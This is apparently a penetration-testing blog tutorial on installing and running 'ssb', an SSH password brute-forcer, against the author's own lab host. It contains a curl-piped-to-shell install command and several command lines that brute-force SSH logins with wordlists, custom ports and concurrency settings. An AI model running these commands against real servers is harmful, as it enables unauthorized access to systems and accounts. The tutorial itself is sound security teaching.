Sponsored
Exploiting Tools

SSB – A Fastest Secure Shell Brute Forcer

Hey Folks, in this tutorial we are going to talk about a secure shell brute forcing tool called “ssb“. It’s an fastest and simplest way to brute force on SSH server by using ssb tool. Although there are many tools to crack the password of SSH server, but it gives us a convenient interface. We assume that you know about SSH Server, so we will move towards the installation of the tool.

Let’s take a look 😛 !!

Install Golang

Originally the tool is designed in GO language, so we have to install “Golang” tool in our kali linux system to operate this tool.

apt install golang -y

Tool Installation

Curl utility is already installed in the kali linux, so you need to execute both these commands sequentially to install and configure this tool.

curl -sSfL 'https://git.io/kitabisa-ssb' | sh -s -- -b /usr/local/bin
GO111MODULE=on go get ktbs.dev/ssb

Woooo 😛 !! The tool is now ready to fly in kali linux. Now you can execute the following command anywhere on the terminal of kali linux and operate this tool.

ssb -h

Start Brute Forcing

We have already configured SSH server on our second machine and now we will try to crack the password. You need to place your wordlist after the “-w” parameter. You can use various tools like cupp, cewl etc. to create a wordlist. As soon as the password matches, it gives us a “connected” signal at the terminal as you can see in the image below.

Usage 😛 !! ssb -w < your wordlist > @ < IP >

ssb -w word.txt msfadmin@192.168.1.8

Port Forwarding

Sometimes developers change the server’s port number for security reasons and as you can see in the image below that the port number of the SSH server has been changed from 22 to 20.

If the port has moved to another port number then you will have to mention in the command by adding the “-p” parameter.

Usage 😛 !! ssb -p < changed port number > -w < your wordlist > @

ssb -p 20 -w word.txt msfadmin@192.168.1.8

Threat level

Apart from this, you can change, add and modify other settings like threat level etc according to you.

ssb -p 20 -w word.txt -t 1m -c 1000 msfadmin@192.168.1.8
About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored

View Comments

  • Hi dude, you may have a great blog site. I enjoy it. And I feel several folks will enjoy too. Why not attempt more challenging to optimize your site, so it will likely be much easier to find this web site in search engine. I don't know how to, but I realize you'll be able to do somewhat tweak with your website to get a superior position. Numerous folks will thanks for the wonderful data. Great task!

Recent Posts

Gau (GetAllUrls) – Find Known and Hidden URL

The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…

3 months ago

Jsluicepp – Burp Extension for JS Secrets – BugBountyTip

Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…

8 months ago

Bypassing Firewalls (WAF) with XSS Payloads

Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…

8 months ago

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 year ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

2 years ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

3 years ago
Sponsored

This website uses cookies.